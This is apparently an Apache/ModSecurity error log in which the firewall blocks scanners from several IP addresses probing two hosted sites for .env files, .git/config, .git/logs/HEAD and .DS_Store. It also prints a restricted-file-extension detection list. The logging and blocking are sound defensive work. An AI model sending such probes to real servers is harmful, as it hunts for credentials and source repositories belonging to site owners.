[Sun Nov 16 06:11:37.298246 2025] [:error] [pid 105715] [client 159.65.18.197:43932] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRldCTHqqjYXoy22w5LwBgAAAAE"]
[Sun Nov 16 06:11:37.298444 2025] [:error] [pid 105715] [client 159.65.18.197:43932] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRldCTHqqjYXoy22w5LwBgAAAAE"]
[Sun Nov 16 06:11:37.417937 2025] [:error] [pid 105761] [client 159.65.18.197:43940] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRldCRajcO0QlxhJbyzqbgAAAAo"]
[Sun Nov 16 06:11:37.418159 2025] [:error] [pid 105761] [client 159.65.18.197:43940] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRldCRajcO0QlxhJbyzqbgAAAAo"]
[Sun Nov 16 06:11:37.418307 2025] [:error] [pid 105761] [client 159.65.18.197:43940] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRldCRajcO0QlxhJbyzqbgAAAAo"]
[Sun Nov 16 06:11:37.521225 2025] [:error] [pid 106191] [client 159.65.18.197:43948] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRldCZ9TX0jrupNVR0KhTwAAAAI"]
[Sun Nov 16 06:11:37.521446 2025] [:error] [pid 106191] [client 159.65.18.197:43948] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRldCZ9TX0jrupNVR0KhTwAAAAI"]
[Sun Nov 16 06:11:37.521615 2025] [:error] [pid 106191] [client 159.65.18.197:43948] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRldCZ9TX0jrupNVR0KhTwAAAAI"]
[Sun Nov 16 06:36:40.846088 2025] [:error] [pid 106374] [client 213.209.157.81:56206] [client 213.209.157.81] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRli6NrxWuU8HNFnXXey0QAAAAc"]
[Sun Nov 16 06:36:40.846416 2025] [:error] [pid 106374] [client 213.209.157.81:56206] [client 213.209.157.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRli6NrxWuU8HNFnXXey0QAAAAc"]
[Sun Nov 16 06:36:40.846569 2025] [:error] [pid 106374] [client 213.209.157.81:56206] [client 213.209.157.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRli6NrxWuU8HNFnXXey0QAAAAc"]
[Sun Nov 16 16:20:45.225419 2025] [authz_core:error] [pid 115926] [client 167.71.175.236:46924] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Nov 16 16:20:46.201705 2025] [:error] [pid 115932] [client 167.71.175.236:46954] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRnrzr3BVy95CDvK5pbxXQAAAAw"]
[Sun Nov 16 16:20:46.201960 2025] [:error] [pid 115932] [client 167.71.175.236:46954] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRnrzr3BVy95CDvK5pbxXQAAAAw"]
[Sun Nov 16 16:20:46.202126 2025] [:error] [pid 115932] [client 167.71.175.236:46954] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRnrzr3BVy95CDvK5pbxXQAAAAw"]
[Sun Nov 16 16:20:46.507032 2025] [:error] [pid 115923] [client 167.71.175.236:46962] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRnrzidAW7ZQW7mmx8SsvwAAAAo"]
[Sun Nov 16 16:20:46.507267 2025] [:error] [pid 115923] [client 167.71.175.236:46962] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRnrzidAW7ZQW7mmx8SsvwAAAAo"]
[Sun Nov 16 16:20:46.507432 2025] [:error] [pid 115923] [client 167.71.175.236:46962] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRnrzidAW7ZQW7mmx8SsvwAAAAo"]
[Sun Nov 16 16:20:46.801050 2025] [:error] [pid 115922] [client 167.71.175.236:46974] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRnrzpTB_QM564J_h8QXugAAAAg"]
[Sun Nov 16 16:20:46.801319 2025] [:error] [pid 115922] [client 167.71.175.236:46974] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRnrzpTB_QM564J_h8QXugAAAAg"]
[Sun Nov 16 16:20:46.801484 2025] [:error] [pid 115922] [client 167.71.175.236:46974] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRnrzpTB_QM564J_h8QXugAAAAg"]
[Sun Nov 16 18:08:48.963433 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRoFIKK4kxSjhxan99MlHgAAAAY"]
[Sun Nov 16 18:08:48.963818 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRoFIKK4kxSjhxan99MlHgAAAAY"]
[Sun Nov 16 18:08:48.963995 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRoFIKK4kxSjhxan99MlHgAAAAY"]
[Sun Nov 16 18:08:49.387797 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRoFIYYUzNZoYnjqey4_JgAAAAc"]
[Sun Nov 16 18:08:49.388189 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRoFIYYUzNZoYnjqey4_JgAAAAc"]
[Sun Nov 16 18:08:49.388361 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRoFIYYUzNZoYnjqey4_JgAAAAc"]
[Sun Nov 16 18:08:49.908107 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRoFIaK4kxSjhxan99MlHwAAAAY"]
[Sun Nov 16 18:08:49.908505 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRoFIaK4kxSjhxan99MlHwAAAAY"]
[Sun Nov 16 18:08:49.908688 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aRoFIaK4kxSjhxan99MlHwAAAAY"]
[Sun Nov 16 18:08:50.315946 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRoFIoYUzNZoYnjqey4_JwAAAAc"]
[Sun Nov 16 18:08:50.316339 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRoFIoYUzNZoYnjqey4_JwAAAAc"]
[Sun Nov 16 18:08:50.316509 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aRoFIoYUzNZoYnjqey4_JwAAAAc"]
[Sun Nov 16 18:08:50.655724 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRoFIqK4kxSjhxan99MlIAAAAAY"]
[Sun Nov 16 18:08:50.656122 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRoFIqK4kxSjhxan99MlIAAAAAY"]
[Sun Nov 16 18:08:50.656310 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aRoFIqK4kxSjhxan99MlIAAAAAY"]
[Sun Nov 16 18:08:51.125515 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRoFI4YUzNZoYnjqey4_KAAAAAc"]
[Sun Nov 16 18:08:51.125689 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRoFI4YUzNZoYnjqey4_KAAAAAc"]
[Sun Nov 16 18:08:51.126078 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRoFI4YUzNZoYnjqey4_KAAAAAc"]
[Sun Nov 16 18:08:51.126286 2025] [:error] [pid 107814] [client 195.178.110.201:59522] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aRoFI4YUzNZoYnjqey4_KAAAAAc"]
[Sun Nov 16 18:08:51.539571 2025] [:error] [pid 113903] [client 195.178.110.201:59532] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aRoFI6K4kxSjhxan99MlIQAAAAY"]
